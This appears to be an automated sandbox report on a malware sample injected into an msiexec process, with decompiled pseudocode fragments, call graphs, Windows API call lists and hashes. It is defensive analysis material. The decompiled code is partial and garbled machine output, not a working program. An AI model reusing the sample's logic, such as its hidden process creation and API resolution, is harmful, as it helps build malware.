                              control_flow_graph 218 407290-4072da call 41a150 call 41ad30 call 409b50 call 413e60 227 4072dc-4072ee PostThreadMessageW 218->227 228 40730e-407312 218->228 229 4072f0-40730a call 4092b0 227->229 230 40730d 227->230 229->230 230->228
                              C-Code - Quality: 82%
                              			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
                              				char _v67;
                              				char _v68;
                              				void* _t12;
                              				intOrPtr* _t13;
                              				int _t14;
                              				long _t21;
                              				intOrPtr* _t25;
                              				void* _t26;
                              				void* _t30;
                              
                              				_t30 = __eflags;
                              				_v68 = 0;
                              				E0041A150( &_v67, 0, 0x3f);
                              				E0041AD30( &_v68, 3);
                              				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
                              				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                              				_t25 = _t13;
                              				if(_t25 != 0) {
                              					_t21 = _a8;
                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                              					if(_t14 == 0) {
                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(1, 8) & 0x000000ff) - 0x40, _t14);
                              					}
                              					return _t14;
                              				}
                              				return _t13;
                              			}













                              APIs
                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                              Yara matches
                              Similarity
                              • API ID: MessagePostThread
                              • String ID:
                              • API String ID: 1836367815-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 260 418a53-418a7a call 4191f0 262 418a7f-418a94 LookupPrivilegeValueW 260->262
                              C-Code - Quality: 53%
                              			E00418A53(void* __ebx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                              				int _t10;
                              				signed int _t19;
                              				signed int _t22;
                              
                              				asm("cli");
                              				_t19 = _t22 * 0x55;
                              				_push(_t22);
                              				_t7 = _a4;
                              				_push(_t19);
                              				E004191F0(0x9eec496f, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                              				return _t10;
                              			}







                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 263 418900-418931 call 4191f0 RtlFreeHeap
                              C-Code - Quality: 100%
                              			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                              				char _t10;
                              				void* _t15;
                              
                              				_t3 = _a4 + 0xc74; // 0xc74
                              				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                              				return _t10;
                              			}






                              APIs
                              • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                              				int _t10;
                              				void* _t15;
                              
                              				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                              				return _t10;
                              			}






                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                              Yara matches
                              Similarity
                              • API ID: LookupPrivilegeValue
                              • String ID:
                              • API String ID: 3899507212-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418940(intOrPtr _a4, int _a8) {
                              				void* _t10;
                              
                              				_t5 = _a4;
                              				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                              				ExitProcess(_a8);
                              			}





                              APIs
                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 37%
                              			E00418933(intOrPtr _a4, int _a8) {
                              				void* _t12;
                              
                              				asm("das");
                              				asm("ror dword [ebp-0x4f], 0x9f");
                              				asm("stc");
                              				_t7 = _a4;
                              				E004191F0(_t12, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
                              				ExitProcess(_a8);
                              			}





                              APIs
                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 71%
                              			E00415681(void* __eax, void* __edi, void* __esi) {
                              				void* _t18;
                              				signed int _t20;
                              				intOrPtr _t23;
                              				void* _t33;
                              				void* _t43;
                              				void* _t44;
                              
                              				asm("lahf");
                              				_t33 = __eax;
                              				_t23 =  *((intOrPtr*)(__edi + 0x85b8735));
                              				_t44 = _t43 - 1;
                              				_push(_t23);
                              				if(_t44 != 0) {
                              					_t4 = _t23 - 0x3f7af33c;
                              					 *_t4 =  *((intOrPtr*)(_t23 - 0x3f7af33c)) + __edi;
                              					if( *_t4 == 0) {
                              						_t27 = __eax + 0x3e60;
                              						if(E0041A930(__eax + 0x3e60, _t23, __eax + 0x3e60, __esi) != 0 || E0041A930(_t27, _t23, _t33 + 0x3e67, __esi) != 0 || E0041A930(_t27, _t23, _t33 + 0x3e6e, __esi) != 0) {
                              							goto L3;
                              						} else {
                              							_t28 = _t33 + 0x3e75;
                              							_t18 = E0041A930(_t33 + 0x3e75, _t23, _t33 + 0x3e75, __esi);
                              							if(_t18 != 0 || E0041A930(_t28, _t23, _t33 + 0x3e7d, __esi) != 0) {
                              								goto L3;
                              							} else {
                              								_t20 = E0041A930(_t28, _t23, _t33 + 0x3e86, __esi);
                              								asm("sbb eax, eax");
                              								return  ~( ~_t20);
                              							}
                              						}
                              					} else {
                              						L3:
                              						return 1;
                              					}
                              				} else {
                              					 *((intOrPtr*)(_t44 + 0x20212b66)) = ss;
                              					asm("adc [edx], ecx");
                              					asm("out 0x3f, eax");
                              					asm("outsb");
                              					return __edi;
                              				}
                              			}










                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E0040C3AE(void* __eax, signed int __ecx, void* __edx, signed int* __esi) {
                              				signed char _t34;
                              
                              				_t34 = __ecx &  *__esi;
                              				 *(_t34 + 0x7d) =  *(_t34 + 0x7d) << 1;
                              				asm("sbb ebp, [ebx+0x10550810]");
                              			}





                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:4.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:697
                              Total number of Limit Nodes:82
31285->31276 31287 ea35b3 31286->31287 31288 ea35df 31287->31288 31308 ea9e80 31287->31308 31288->31205 31290 ea35ca 31291 eaa0b0 2 API calls 31290->31291 31292 ea35d3 31291->31292 31292->31205 31293->31177 31294->31199 31296 ea91f0 LdrLoadDll 31295->31296 31297 ea3d24 31295->31297 31296->31297 31298 ea85b0 LdrLoadDll 31297->31298 31298->31201 31300 ea91f0 LdrLoadDll 31299->31300 31301 ea873c NtClose 31300->31301 31301->31206 31302->31186 31303->31250 31305 ea86a6 31304->31305 31306 ea91f0 LdrLoadDll 31305->31306 31307 ea86bc NtReadFile 31306->31307 31307->31281 31309 ea9ea4 31308->31309 31310 ea9e8d 31308->31310 31309->31290 31310->31309 31311 eaa280 LdrLoadDll 31310->31311 31312 ea9ebb 31311->31312 31312->31290 31314 eaa281 31313->31314 31319 ea88c0 31314->31319 31316 eaa298 31316->31279 31317->31280 31318->31269 31320 ea91f0 LdrLoadDll 31319->31320 31321 ea88dc 31320->31321 31321->31316 31323 eaa05d 31322->31323 31452 ea87d0 LdrLoadDll 31322->31452 31323->31211 31326 ea3081 31325->31326 31327 ea3089 31325->31327 31326->31214 31356 ea335c 31327->31356 31453 eab260 31327->31453 31329 ea30dd 31330 eab260 LdrLoadDll 31329->31330 31331 ea30e8 31330->31331 31332 ea3136 31331->31332 31335 eab390 2 API calls 31331->31335 31467 eab300 LdrLoadDll RtlFreeHeap 31331->31467 31334 eab260 LdrLoadDll 31332->31334 31337 ea314a 31334->31337 31335->31331 31336 ea31a7 31338 eab260 LdrLoadDll 31336->31338 31337->31336 31458 eab390 31337->31458 31339 ea31bd 31338->31339 31341 ea31fa 31339->31341 31343 eab390 2 API calls 31339->31343 31342 eab260 LdrLoadDll 31341->31342 31344 ea3205 31342->31344 31343->31339 31345 eab390 2 API calls 31344->31345 31352 ea323f 31344->31352 31345->31344 31348 eab2c0 2 API calls 31349 ea333e 31348->31349 31350 eab2c0 2 API calls 31349->31350 31351 ea3348 31350->31351 31353 eab2c0 2 API calls 31351->31353 31464 eab2c0 31352->31464 31354 ea3352 31353->31354 31355 eab2c0 2 API calls 31354->31355 31355->31356 31356->31214 31358 ea43b1 31357->31358 31359 
ea3a60 8 API calls 31358->31359 31360 ea43c7 31359->31360 31361 ea4402 31360->31361 31362 ea4415 31360->31362 31366 ea441a 31360->31366 31363 eaa0b0 2 API calls 31361->31363 31364 eaa0b0 2 API calls 31362->31364 31365 ea4407 31363->31365 31364->31366 31365->31218 31366->31218 31468 ea8ec0 31367->31468 31370 ea8ec0 LdrLoadDll 31371 ea901d 31370->31371 31372 ea8ec0 LdrLoadDll 31371->31372 31373 ea9026 31372->31373 31374 ea8ec0 LdrLoadDll 31373->31374 31375 ea902f 31374->31375 31376 ea8ec0 LdrLoadDll 31375->31376 31377 ea9038 31376->31377 31378 ea8ec0 LdrLoadDll 31377->31378 31379 ea9041 31378->31379 31380 ea8ec0 LdrLoadDll 31379->31380 31381 ea904d 31380->31381 31382 ea8ec0 LdrLoadDll 31381->31382 31383 ea9056 31382->31383 31384 ea8ec0 LdrLoadDll 31383->31384 31385 ea905f 31384->31385 31386 ea8ec0 LdrLoadDll 31385->31386 31387 ea9068 31386->31387 31388 ea8ec0 LdrLoadDll 31387->31388 31389 ea9071 31388->31389 31390 ea8ec0 LdrLoadDll 31389->31390 31391 ea907a 31390->31391 31392 ea8ec0 LdrLoadDll 31391->31392 31393 ea9086 31392->31393 31394 ea8ec0 LdrLoadDll 31393->31394 31395 ea908f 31394->31395 31396 ea8ec0 LdrLoadDll 31395->31396 31397 ea9098 31396->31397 31398 ea8ec0 LdrLoadDll 31397->31398 31399 ea90a1 31398->31399 31400 ea8ec0 LdrLoadDll 31399->31400 31401 ea90aa 31400->31401 31402 ea8ec0 LdrLoadDll 31401->31402 31403 ea90b3 31402->31403 31404 ea8ec0 LdrLoadDll 31403->31404 31405 ea90bf 31404->31405 31406 ea8ec0 LdrLoadDll 31405->31406 31407 ea90c8 31406->31407 31408 ea8ec0 LdrLoadDll 31407->31408 31409 ea90d1 31408->31409 31410 ea8ec0 LdrLoadDll 31409->31410 31411 ea90da 31410->31411 31412 ea8ec0 LdrLoadDll 31411->31412 31413 ea90e3 31412->31413 31414 ea8ec0 LdrLoadDll 31413->31414 31415 ea90ec 31414->31415 31416 ea8ec0 LdrLoadDll 31415->31416 31417 ea90f8 31416->31417 31418 ea8ec0 LdrLoadDll 31417->31418 31419 ea9101 31418->31419 31420 ea8ec0 LdrLoadDll 31419->31420 31421 ea910a 31420->31421 31422 ea8ec0 LdrLoadDll 31421->31422 31423 ea9113 31422->31423 31424 
ea8ec0 LdrLoadDll 31423->31424 31425 ea911c 31424->31425 31426 ea8ec0 LdrLoadDll 31425->31426 31427 ea9125 31426->31427 31428 ea8ec0 LdrLoadDll 31427->31428 31429 ea9131 31428->31429 31430 ea8ec0 LdrLoadDll 31429->31430 31431 ea913a 31430->31431 31432 ea8ec0 LdrLoadDll 31431->31432 31433 ea9143 31432->31433 31434 ea8ec0 LdrLoadDll 31433->31434 31435 ea914c 31434->31435 31436 ea8ec0 LdrLoadDll 31435->31436 31437 ea9155 31436->31437 31438 ea8ec0 LdrLoadDll 31437->31438 31439 ea915e 31438->31439 31440 ea8ec0 LdrLoadDll 31439->31440 31441 ea916a 31440->31441 31442 ea8ec0 LdrLoadDll 31441->31442 31443 ea9173 31442->31443 31444 ea8ec0 LdrLoadDll 31443->31444 31445 ea917c 31444->31445 31445->31222 31447 ea91f0 LdrLoadDll 31446->31447 31448 ea816c 31447->31448 31474 4d49860 LdrInitializeThunk 31448->31474 31449 ea8183 31449->31143 31451->31219 31452->31323 31454 eab270 31453->31454 31455 eab276 31453->31455 31454->31329 31456 eaa280 LdrLoadDll 31455->31456 31457 eab29c 31456->31457 31457->31329 31459 eab300 31458->31459 31460 eab35d 31459->31460 31461 eaa280 LdrLoadDll 31459->31461 31460->31337 31462 eab33a 31461->31462 31463 eaa0b0 2 API calls 31462->31463 31463->31460 31465 eaa0b0 2 API calls 31464->31465 31466 ea3334 31465->31466 31466->31348 31467->31331 31469 ea8edb 31468->31469 31470 ea3e60 LdrLoadDll 31469->31470 31471 ea8efb 31470->31471 31472 ea3e60 LdrLoadDll 31471->31472 31473 ea8fa7 31471->31473 31472->31473 31473->31370 31474->31449 31476 4d49681 31475->31476 31477 4d4968f LdrInitializeThunk 31475->31477 31476->31228 31477->31228 31479 ea91f0 LdrLoadDll 31478->31479 31480 ea891c RtlFreeHeap 31479->31480 31480->31232 31482 e96e3b 31481->31482 31483 e96e40 31481->31483 31482->31151 31484 eaa030 LdrLoadDll 31483->31484 31491 e96e65 31484->31491 31485 e96ec8 31485->31151 31486 ea8150 2 API calls 31486->31491 31487 e96ece 31488 e96ef4 31487->31488 31490 ea8850 2 API calls 31487->31490 31488->31151 31493 e96ee5 31490->31493 31491->31485 31491->31486 31491->31487 
31492 eaa030 LdrLoadDll 31491->31492 31497 ea8850 31491->31497 31492->31491 31493->31151 31495 ea8850 2 API calls 31494->31495 31496 e9710e 31495->31496 31496->31108 31498 ea886c 31497->31498 31499 ea91f0 LdrLoadDll 31497->31499 31502 4d496e0 LdrInitializeThunk 31498->31502 31499->31498 31500 ea8883 31500->31491 31502->31500 31504 ea9853 31503->31504 31507 e99b50 31504->31507 31508 e99b74 31507->31508 31509 e99bb0 LdrLoadDll 31508->31509 31510 e98a7a 31508->31510 31509->31510 31510->31114 31512 e99ec3 31511->31512 31513 e99f40 31512->31513 31526 ea7f20 LdrLoadDll 31512->31526 31513->31121 31516 ea91f0 LdrLoadDll 31515->31516 31517 e9cfbb 31516->31517 31517->31129 31518 ea8a60 31517->31518 31519 ea91f0 LdrLoadDll 31518->31519 31520 ea8a7f LookupPrivilegeValueW 31519->31520 31520->31125 31522 ea91f0 LdrLoadDll 31521->31522 31523 ea850c 31522->31523 31527 4d49910 LdrInitializeThunk 31523->31527 31524 ea852b 31524->31126 31526->31513 31527->31524 31529 e9a047 31528->31529 31530 e99ea0 LdrLoadDll 31529->31530 31531 e9a076 31530->31531 31531->31067 31533 e99d94 31532->31533 31586 ea7f20 LdrLoadDll 31533->31586 31535 e99dce 31535->31069 31537 e9d1ac 31536->31537 31538 e9a020 LdrLoadDll 31537->31538 31539 e9d1be 31538->31539 31587 e9d090 31539->31587 31542 e9d1d9 31544 e9d1e4 31542->31544 31546 ea8720 2 API calls 31542->31546 31543 e9d1f1 31545 e9d202 31543->31545 31547 ea8720 2 API calls 31543->31547 31544->31073 31545->31073 31546->31544 31547->31545 31549 e9aef6 31548->31549 31550 e9af00 31548->31550 31549->31082 31551 e99ea0 LdrLoadDll 31550->31551 31552 e9af71 31551->31552 31553 e99d70 LdrLoadDll 31552->31553 31554 e9af85 31553->31554 31555 e9afa8 31554->31555 31556 e99ea0 LdrLoadDll 31554->31556 31557 e9afc4 31554->31557 31555->31082 31556->31557 31558 ea3a60 8 API calls 31557->31558 31559 e9b019 31558->31559 31559->31082 31561 e9ba69 31560->31561 31562 e99ea0 LdrLoadDll 31561->31562 31563 e9ba8a 31562->31563 31606 e9b740 31563->31606 31565 e97f9c 31584 e9b030 
LdrLoadDll 31565->31584 31635 e9d440 31566->31635 31568 e97e41 31568->31071 31569 e97c93 31569->31568 31640 ea33b0 31569->31640 31571 e97cf2 31571->31568 31643 e97a30 31571->31643 31574 eab260 LdrLoadDll 31575 e97d39 31574->31575 31576 eab390 2 API calls 31575->31576 31580 e97d4e 31576->31580 31577 e96e30 3 API calls 31577->31580 31580->31568 31580->31577 31582 e970f0 2 API calls 31580->31582 31648 e9ac10 31580->31648 31698 e9d3e0 31580->31698 31702 e9cec0 19 API calls 31580->31702 31582->31580 31583->31076 31584->31087 31585->31095 31586->31535 31588 e9d0aa 31587->31588 31596 e9d160 31587->31596 31589 e99ea0 LdrLoadDll 31588->31589 31590 e9d0cc 31589->31590 31597 ea81d0 31590->31597 31592 e9d10e 31600 ea8210 31592->31600 31595 ea8720 2 API calls 31595->31596 31596->31542 31596->31543 31598 ea81ec 31597->31598 31599 ea91f0 LdrLoadDll 31597->31599 31598->31592 31599->31598 31601 ea91f0 LdrLoadDll 31600->31601 31602 ea822c 31601->31602 31605 4d49fe0 LdrInitializeThunk 31602->31605 31603 e9d154 31603->31595 31605->31603 31607 e9b757 31606->31607 31608 e9b79f 31607->31608 31615 e9d480 31607->31615 31623 ea8970 31608->31623 31611 e9b7cb 31612 e9b7d2 31611->31612 31626 ea8530 LdrLoadDll 31611->31626 31612->31565 31614 e9b7e5 31614->31565 31616 e9d4a5 31615->31616 31627 e97130 31616->31627 31618 e9d4c9 31619 e9d4d6 31618->31619 31620 ea3a60 8 API calls 31618->31620 31622 eaa0b0 2 API calls 31618->31622 31634 e9d2c0 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 31618->31634 31619->31608 31620->31618 31622->31618 31624 ea91f0 LdrLoadDll 31623->31624 31625 ea898f CreateProcessInternalW 31624->31625 31625->31611 31626->31614 31628 e9722f 31627->31628 31629 e97145 31627->31629 31628->31618 31629->31628 31630 ea3a60 8 API calls 31629->31630 31631 e971b2 31630->31631 31632 eaa0b0 2 API calls 31631->31632 31633 e971d9 31631->31633 31632->31633 31633->31618 31634->31618 31636 ea3e60 LdrLoadDll 31635->31636 31637 e9d45f 31636->31637 31638 e9d46d 31637->31638 31639 e9d466 
SetErrorMode 31637->31639 31638->31569 31639->31638 31642 ea33d6 31640->31642 31703 e9d210 31640->31703 31642->31571 31644 eaa030 LdrLoadDll 31643->31644 31647 e97a55 31644->31647 31645 e97c6a 31645->31574 31647->31645 31722 ea7b10 31647->31722 31649 e9ac29 31648->31649 31650 e9ac2f 31648->31650 31771 e9ccd0 31649->31771 31780 e98630 31650->31780 31653 e9ac3c 31654 eab390 2 API calls 31653->31654 31697 e9aec8 31653->31697 31655 e9ac58 31654->31655 31656 e9ac6c 31655->31656 31657 e9d3e0 2 API calls 31655->31657 31789 ea7fa0 31656->31789 31657->31656 31660 e9ad96 31805 e9abb0 LdrLoadDll LdrInitializeThunk 31660->31805 31661 ea8190 2 API calls 31662 e9acea 31661->31662 31662->31660 31667 e9acf6 31662->31667 31664 e9adb5 31665 e9adbd 31664->31665 31806 e9ab20 LdrLoadDll NtClose LdrInitializeThunk 31664->31806 31668 ea8720 2 API calls 31665->31668 31666 e9ad3f 31672 ea8720 2 API calls 31666->31672 31667->31666 31670 ea82a0 2 API calls 31667->31670 31667->31697 31671 e9adc7 31668->31671 31670->31666 31671->31580 31674 e9ad5c 31672->31674 31673 e9addf 31673->31665 31675 e9ade6 31673->31675 31792 ea75c0 31674->31792 31677 e9adfe 31675->31677 31807 e9aaa0 LdrLoadDll LdrInitializeThunk 31675->31807 31808 ea8020 LdrLoadDll 31677->31808 31679 e9ad73 31679->31697 31795 e97290 31679->31795 31681 e9ae12 31809 e9a920 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31681->31809 31685 e9ae36 31686 e9ae83 31685->31686 31810 ea8050 LdrLoadDll 31685->31810 31812 ea80b0 LdrLoadDll 31686->31812 31689 e9ae91 31691 ea8720 2 API calls 31689->31691 31690 e9ae54 31690->31686 31811 ea80e0 LdrLoadDll 31690->31811 31692 e9ae9b 31691->31692 31693 ea8720 2 API calls 31692->31693 31695 e9aea5 31693->31695 31696 e97290 3 API calls 31695->31696 31695->31697 31696->31697 31697->31580 31699 e9d3f3 31698->31699 31883 ea8120 31699->31883 31702->31580 31704 e9d22d 31703->31704 31710 ea8250 31704->31710 31707 e9d275 31707->31642 31711 ea91f0 LdrLoadDll 31710->31711 31712 ea826c 31711->31712 31720 
4d499a0 LdrInitializeThunk 31712->31720 31713 e9d26e 31713->31707 31715 ea82a0 31713->31715 31716 ea91f0 LdrLoadDll 31715->31716 31717 ea82bc 31716->31717 31721 4d49780 LdrInitializeThunk 31717->31721 31718 e9d29e 31718->31642 31720->31713 31721->31718 31723 eaa280 LdrLoadDll 31722->31723 31724 ea7b27 31723->31724 31743 e98170 31724->31743 31726 ea7b42 31727 ea7b69 31726->31727 31728 ea7b80 31726->31728 31729 eaa0b0 2 API calls 31727->31729 31731 eaa030 LdrLoadDll 31728->31731 31730 ea7b76 31729->31730 31730->31645 31732 ea7bba 31731->31732 31733 eaa030 LdrLoadDll 31732->31733 31734 ea7bd3 31733->31734 31740 ea7e74 31734->31740 31749 eaa070 LdrLoadDll 31734->31749 31736 ea7e59 31737 ea7e60 31736->31737 31736->31740 31738 eaa0b0 2 API calls 31737->31738 31739 ea7e6a 31738->31739 31739->31645 31741 eaa0b0 2 API calls 31740->31741 31742 ea7ec9 31741->31742 31742->31645 31744 e98195 31743->31744 31745 e99b50 LdrLoadDll 31744->31745 31746 e981c8 31745->31746 31748 e981ed 31746->31748 31750 e9b350 31746->31750 31748->31726 31749->31736 31751 e9b37c 31750->31751 31752 ea8470 LdrLoadDll 31751->31752 31753 e9b395 31752->31753 31754 e9b39c 31753->31754 31761 ea84b0 31753->31761 31754->31748 31758 e9b3d7 31759 ea8720 2 API calls 31758->31759 31760 e9b3fa 31759->31760 31760->31748 31762 ea84cc 31761->31762 31763 ea91f0 LdrLoadDll 31761->31763 31770 4d49710 LdrInitializeThunk 31762->31770 31763->31762 31764 e9b3bf 31764->31754 31766 ea8aa0 31764->31766 31767 ea8aa1 31766->31767 31768 ea91f0 LdrLoadDll 31767->31768 31769 ea8abf 31768->31769 31769->31758 31770->31764 31772 e9cce7 31771->31772 31813 e9bdc0 31771->31813 31779 e9cd00 31772->31779 31826 e93d70 31772->31826 31774 eaa280 LdrLoadDll 31776 e9cd0e 31774->31776 31776->31650 31777 e9ccfa 31850 ea7440 31777->31850 31779->31774 31782 e9864b 31780->31782 31781 e9876b 31781->31653 31782->31781 31783 e9d090 3 API calls 31782->31783 31784 e9874c 31783->31784 31785 e9877a 31784->31785 31786 e98761 31784->31786 31787 ea8720 2 API 
calls 31784->31787 31785->31653 31882 e95ea0 LdrLoadDll 31786->31882 31787->31786 31790 ea91f0 LdrLoadDll 31789->31790 31791 e9acc0 31790->31791 31791->31660 31791->31661 31791->31697 31793 e9d3e0 2 API calls 31792->31793 31794 ea75f2 31793->31794 31794->31679 31796 e972a8 31795->31796 31797 e99b50 LdrLoadDll 31796->31797 31798 e972c3 31797->31798 31799 ea3e60 LdrLoadDll 31798->31799 31800 e972d3 31799->31800 31801 e972dc PostThreadMessageW 31800->31801 31802 e9730d 31800->31802 31801->31802 31803 e972f0 31801->31803 31802->31580 31804 e972fa PostThreadMessageW 31803->31804 31804->31802 31805->31664 31806->31673 31807->31677 31808->31681 31809->31685 31810->31690 31811->31686 31812->31689 31814 e9bdf3 31813->31814 31855 e9a160 31814->31855 31816 e9be05 31859 e9a2d0 31816->31859 31818 e9be23 31819 e9a2d0 LdrLoadDll 31818->31819 31820 e9be39 31819->31820 31821 e9d210 3 API calls 31820->31821 31822 e9be5d 31821->31822 31823 e9be64 31822->31823 31865 eaa2c0 LdrLoadDll 31822->31865 31823->31772 31825 e9be74 31825->31772 31827 e93d96 31826->31827 31828 e9b350 3 API calls 31827->31828 31830 e93e61 31828->31830 31829 e93e68 31829->31777 31830->31829 31867 eaa300 31830->31867 31832 e93ec9 31833 e99ea0 LdrLoadDll 31832->31833 31834 e93fd3 31833->31834 31835 e99ea0 LdrLoadDll 31834->31835 31836 e93ff7 31835->31836 31871 e9b410 31836->31871 31840 e94083 31841 eaa030 LdrLoadDll 31840->31841 31842 e94110 31841->31842 31843 eaa030 LdrLoadDll 31842->31843 31845 e9412a 31843->31845 31844 e942a6 31844->31777 31845->31844 31846 e99ea0 LdrLoadDll 31845->31846 31847 e9416a 31846->31847 31848 e99d70 LdrLoadDll 31847->31848 31849 e9420a 31848->31849 31849->31777 31851 ea3e60 LdrLoadDll 31850->31851 31852 ea7461 31851->31852 31853 ea7487 31852->31853 31854 ea7474 CreateThread 31852->31854 31853->31779 31854->31779 31856 e9a16a 31855->31856 31857 e99ea0 LdrLoadDll 31856->31857 31858 e9a1c3 31857->31858 31858->31816 31860 e99ea0 LdrLoadDll 31859->31860 31861 e9a2e9 31859->31861 31860->31861 
31863 e9a328 31861->31863 31866 ea1880 LdrLoadDll 31861->31866 31863->31818 31864 e9a3e0 31864->31818 31865->31825 31866->31864 31868 eaa30d 31867->31868 31869 ea3e60 LdrLoadDll 31868->31869 31870 eaa320 31869->31870 31870->31832 31872 e9b435 31871->31872 31876 ea8320 31872->31876 31875 ea83b0 LdrLoadDll 31875->31840 31877 ea91f0 LdrLoadDll 31876->31877 31878 ea833c 31877->31878 31881 4d496d0 LdrInitializeThunk 31878->31881 31879 e9405c 31879->31840 31879->31875 31881->31879 31882->31781 31884 ea91f0 LdrLoadDll 31883->31884 31885 ea813c 31884->31885 31888 4d49840 LdrInitializeThunk 31885->31888 31886 e9d41e 31886->31580 31888->31886 31889 ea7310 31890 ea734b 31889->31890 31891 eaa030 LdrLoadDll 31889->31891 31892 ea742c 31890->31892 31893 e99b50 LdrLoadDll 31890->31893 31891->31890 31894 ea7381 31893->31894 31895 ea3e60 LdrLoadDll 31894->31895 31897 ea739d 31895->31897 31896 ea73b0 Sleep 31896->31897 31897->31892 31897->31896 31900 ea6f40 LdrLoadDll 31897->31900 31901 ea7140 LdrLoadDll 31897->31901 31900->31897 31901->31897

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 315 ea8642-ea864f 316 ea8651-ea8699 call ea91f0 315->316 317 ea86a6-ea86e9 call ea91f0 NtReadFile 315->317 316->317
                              APIs
                              • NtReadFile.NTDLL(00EA3D82,5E972F65,FFFFFFFF,?,?,?,00EA3D82,?,A:,FFFFFFFF,5E972F65,00EA3D82,?,00000000), ref: 00EA86E5
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID: *9$A:
                              • API String ID: 2738559852-581087195
                              • Opcode ID: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                              • Instruction ID: 9b8d17a9c40fce361f7a9e96ba15f0ce0095c343d0adef75e2787d8b1654b7a0
                              • Opcode Fuzzy Hash: a03d9bae96f467c0aa395323aaccb52df568358fa498be35b51e186da3de9fc5
                              • Instruction Fuzzy Hash: 3021E3B2204109ABDB18DF99DC84EEB77A9EF8C354F158248BA0DA7241C630E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 452 ea85ea-ea8641 call ea91f0 NtCreateFile
                              APIs
                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00EA3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EA3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00EA863D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.938025961.0000000000E90000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E90000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_e90000_msiexec.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID: .z`
                              • API String ID: 823142352-1441809116
                              • Opcode ID: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                              • Instruction ID: 63a6c63958b1a336d2440d6f4afa5846daaf97b707c975b53816434eb4d40bc7
                              • Opcode Fuzzy Hash: 5665064f3c64043a90c0fd2c1c31b96cfa13a65bfc068bcfabdd1cfea6a69486
                              • Instruction Fuzzy Hash: 6901A4B2611108AFCB48CF98DC85EEB77E9AF9C754F158249BA0DD7241D630E811CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              control_flow_graph 455 ea85f0-ea8606 456 ea860c-ea8641 NtCreateFile 455->456 457 ea8607 call ea91f0 455->457 457->456
                              APIs
                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00EA3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00EA3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00EA863D
                              Strings
                              Memory Dump Source
